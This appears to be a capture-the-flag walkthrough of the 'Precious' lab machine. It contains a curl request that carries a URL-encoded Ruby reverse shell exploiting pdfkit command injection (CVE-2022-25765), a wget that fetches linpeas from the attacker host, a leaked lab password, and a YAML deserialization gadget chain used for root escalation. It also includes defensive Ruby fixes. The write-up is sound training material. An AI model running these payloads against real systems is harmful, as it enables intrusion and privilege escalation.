Precious

TARGET IP: 10.10.11.189
HOST IP: 10.10.16.10
Recon
NMAP
nmap [Target IP]

nmap -A -p 22,80 [Target IP]

HTTP
First, map the hostname to the target IP address by adding it to the hosts file.
echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts



I tried adding a URL to see what happens, but it looks like it does not have web access to view the page.
I tried http://precious.htb/ and that still didn't work.
It does look like it will return credentials back depending on what you put in.
Enumeration
Gobuster
gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt

Exploit
It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.
Long story short, I created payloads with different file extensions. It seems like the machine filters out .php and .rb file extensions and will make a PDF file of any other file type I load into it. I did this by starting up a Python web server on my host machine, plugging the URL into the input box on the web server, and opening up a netcat listener to see if I could get something to stick.
I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.
JAVA
I started trying out Java reverse shells and got something interesting when I used a Java one-liner with the .xml file extension.
PDF
I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.
exiftool [PDF File Path]

It looks like the Creator is pdfkit V0.8.6. Let's go take a look at how I can possibly exploit this.
CVE-2022-25765
Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.
Set up a netcat listener
nc -lvnp 4444
I found a tool on Github that uses a curl command to form a reverse shell that exploits the vulnerability.
curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'
The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.
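For the defensive side of CVE-2022-25765, here is an added Ruby example (not the page's curl command and not pdfkit's own code) of the two controls that close this class of bug in an app that hands a user-supplied URL to wkhtmltopdf: accept only a plain http(s) URL made of RFC 3986 characters, and spawn the renderer with an argv array so no shell ever parses the string. The renderer binary name wkhtmltopdf and the function names are assumptions.

```ruby
require "uri"
require "open3"

# Characters RFC 3986 allows in a URL. Space, backtick, double quote, "<", ">",
# "|", "{" and "}" are not among them, so their presence means the input is not
# a URL at all and it is rejected before anything else looks at it.
URL_CHARS = %r{\A[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+\z}
ALLOWED_SCHEMES = %w[http https].freeze

# Returns the parsed URI for a well-formed absolute http(s) URL, nil otherwise.
def validate_render_url(raw)
  return nil unless raw.is_a?(String) && raw.match?(URL_CHARS)
  uri = URI.parse(raw)
  return nil unless ALLOWED_SCHEMES.include?(uri.scheme)
  return nil if uri.host.nil? || uri.host.empty?
  uri
rescue URI::InvalidURIError
  nil
end

# The renderer invocation as an argv array. Open3/Process.spawn given an array
# execs the binary directly, so the URL is one argument and never passes through
# a shell; backticks, "$(", ";" or "|" inside it are just bytes.
def render_argv(uri, out_path, renderer: "wkhtmltopdf")
  [renderer, uri.to_s, out_path]
end

# End to end: validate, then spawn without a shell. Raises on rejected input.
def render_pdf(raw_url, out_path)
  uri = validate_render_url(raw_url)
  raise ArgumentError, "rejected URL: not a plain http(s) URL" if uri.nil?
  _stdout, stderr, status = Open3.capture3(*render_argv(uri, out_path))
  raise "renderer failed: #{stderr.strip}" unless status.success?
  out_path
end
```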
Let's get a more interactive shell to work with.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z
On the host machine, reopen the terminal and ignore the echo.
stty raw -echo; fg
Let's go look for the user flag.
find / -name user.txt 2>/dev/null
Looks like the file is unreadable due to permissions. Let's see what we can do about that.
I now know we have at least 3 users on the system:
henry
ruby
root
We can confirm this in the /etc/passwd file.
I tried sudo -l but it needed a password. I also spent some time digging around to try to find some other useful information. In the end, I went ahead and uploaded linpeas and ran it to see what was available. I used the same Python web server I already had running.
wget http://[HOST IP]:8000/linpeas.sh
./linpeas.sh
I wasn't getting anywhere there, so I started browsing around a bit more. In the file /home/ruby/.bundle/config I found some juicy info.
Looks like possible credentials for henry.
henry:Q3c1AqGHtoI0aXAYFH
I'll now SSH into the machine with henry's credentials and it works.
ssh henry@[Target IP]
Now let's get that user file.
0d534cd692f6860abfeb9af4ba3c4e92
Next step is to see what privileges I have as Henry.
sudo -l
We have sudo privileges to run the update_dependencies.rb file. If we cat that file we can see that it reads a dependencies.yml file.
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
  # YAML.load deserializes arbitrary tagged Ruby objects, and the path is
  # relative to the caller's working directory, not the script's location.
  YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
  Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
  gems_local.each do |local_name, local_version|
    if(file_name == local_name)
      if(file_version != local_version)
        puts "Installed version differs from the one specified in file: " + local_name
      else
        puts "Installed version is equals to the one specified in file: " + local_name
      end
    end
  end
end
With this information, we should be able to craft a new dependencies.yml file with malicious code that the script will deserialize as sudo. In the /home/henry directory we will create a new dependencies.yml file and use this code snippet I got online.
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve
You'll notice that git_set is set to chmod +s /bin/bash. This sets the SUID bit on that file, which means we should be able to exploit it and escalate our privileges.
In the same directory where you created the dependencies.yml file, run the following:
sudo /usr/bin/ruby /opt/update_dependencies.rb
This will execute the file and end up changing the /bin/bash file permissions. After this is done, we can use a privilege escalation technique from GTFOBins to escalate our privileges.
/bin/bash -p
Check who you are with whoami and you should now be root.
cat /root/root.txt
7090f28f7bc0ffc0a8b3203bd45ff6ac
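The root step above works because the sudo-allowed script loads a YAML file from the caller's working directory with YAML.load. As an added example (not the box's script), this is how that script could be written so the same dependencies.yml no longer gives code execution: YAML.safe_load with no permitted classes and aliases disabled, a file path fixed relative to the script rather than the cwd, and a shape check on the loaded document. Function names are assumptions; Psych 4 (Ruby 3.1) already makes YAML.load behave like safe_load, but the explicit call covers older Ruby as well.

```ruby
require "yaml"

# Path fixed relative to this script, so "sudo ruby /opt/script.rb" run from
# a user's home directory cannot pick up a dependencies.yml placed there.
DEPS_FILE = File.expand_path("dependencies.yml", __dir__)

# Parses the dependencies document into { "gem" => "version" }.
# safe_load only builds strings, numbers, arrays and hashes: a "!ruby/object:"
# tag raises Psych::DisallowedClass instead of instantiating anything, and
# aliases: false blocks the "&1 ... *1" tricks gadget chains rely on.
def parse_dependencies(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  raise ArgumentError, "expected a mapping of gem => version" unless data.is_a?(Hash)
  data.to_h { |name, version| [String(name), String(version)] }
rescue Psych::Exception => e
  raise ArgumentError, "unsafe or malformed dependencies file: #{e.message}"
end

def list_from_file(path = DEPS_FILE)
  parse_dependencies(File.read(path))
end

def list_local_gems
  Gem::Specification.map { |g| [g.name, g.version.to_s] }.to_h
end

# Returns { "gem" => :same | :differs } for gems present in both lists.
def compare_versions(wanted, installed)
  wanted.each_with_object({}) do |(name, version), out|
    next unless installed.key?(name)
    out[name] = installed[name] == version ? :same : :differs
  end
end

# Human-readable report lines, one per gem found locally.
def report_lines(wanted, installed)
  compare_versions(wanted, installed).map do |name, result|
    verb = result == :same ? "matches" : "differs from"
    "#{name}: installed version #{verb} the one specified in dependencies.yml"
  end
end
```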